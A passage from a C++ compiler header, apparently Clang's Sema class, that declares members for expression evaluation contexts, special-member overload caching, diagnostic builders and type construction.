FD->setWillHaveBody(false);
S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
/// WeakUndeclaredIdentifiers - Identifiers contained in
/// \#pragma weak before declared. rare. may alias another
/// identifier, declared or undeclared
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in
/// \#pragma redefine_extname before declared. Used in Solaris system headers
/// to define functions that occur in multiple standards to call the version
/// in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library resides.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// will hold 'respondsToSelector:'
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields. This is really a
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
using ImmediateInvocationCandidate = llvm::PointerIntPair<ConstantExpr *, 1>;
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are not discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// Set of candidates for starting an immediate invocation.
llvm::SmallVector<ImmediateInvocationCandidate, 4> ImmediateInvocationCandidates;
/// Set of DeclRefExprs referencing a consteval function when used in a
/// context not already known to be immediately invoked.
llvm::SmallPtrSet<DeclRefExpr *, 4> ReferenceToConsteval;
/// \brief Describes whether we are in an expression constext which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// argument locations.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedInternals - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// At the head of the list it is recorded whether there were 0, 1, or >= 2
/// methods inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the FPFeatures state on entry/exit of compound
/// statements.
class FPFeaturesStateRAII {
public:
FPFeaturesStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.FPFeatures) {}
~FPFeaturesStateRAII() { S.FPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getFPOptions() { return FPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
///Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
///\param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, so the user-defined ~SemaDiagnosticBuilder is a safe no-op
// in that case anwyay.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
/// Invent a new identifier for parameters of abbreviated templates.
IdentifierInfo *
InventAbbreviatedTemplateParameterTypeName(IdentifierInfo *ParamName,
unsigned Index);
void emitAndClearUnusedLocalTypedefWarnings();
private:
/// Function or variable declarations to be checked for whether the deferred
/// diagnostics should be emitted.
SmallVector<Decl *, 4> DeclsToCheckForDeferredDiags;
public:
// Emit all deferred diagnostics.
void emitDeferredDiags();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if should find the top-most
/// lambda scope info ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
/// Called before parsing a function declarator belonging to a function
/// declaration.
void ActOnStartFunctionDeclarationDeclarator(Declarator &D,
unsigned TemplateParameterDepth);
/// Called after parsing a function declarator belonging to a function
/// declaration.
void ActOnFinishFunctionDeclarationDeclarator(Declarator &D);
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
protected:
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
/// A derivative of BoundTypeDiagnoser for which the diagnostic's type
/// parameter is preceded by a 0/1 enum that is 1 if the type is sizeless.
/// For example, a diagnostic with no other parameters would generally have
/// the form "...%select{incomplete|sizeless}0 type %1...".
template <typename... Ts>
class SizelessTypeDiagnoser : public BoundTypeDiagnoser<Ts...> {
public:
SizelessTypeDiagnoser(unsigned DiagID, const Ts &... Args)
: BoundTypeDiagnoser<Ts...>(DiagID, Args...) {}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, this->DiagID);
this->emit(DB, std::index_sequence_for<Ts...>());
DB << T->isSizelessType() << T;
}
};
enum class CompleteTypeKind {
/// Apply the normal rules for complete types. In particular,
/// treat all sizeless types as incomplete.
Normal,
/// Relax the normal rules for complete types so that they include
/// sizeless built-in types.
AcceptSizeless,
// FIXME: Eventually we should flip the default to Normal and opt in
// to AcceptSizeless rather than opt out of it.
Default = AcceptSizeless
};
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up as
/// they are parsed, meaning that a noderef pointer may not be accessed. For
/// example, in `&*p` where `p` is a noderef pointer, we will first parse the
/// `*p`, but need to check that `address of` is called on it. This requires
/// keeping a container of all pending expressions and checking if the address
/// of them are eventually taken.
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
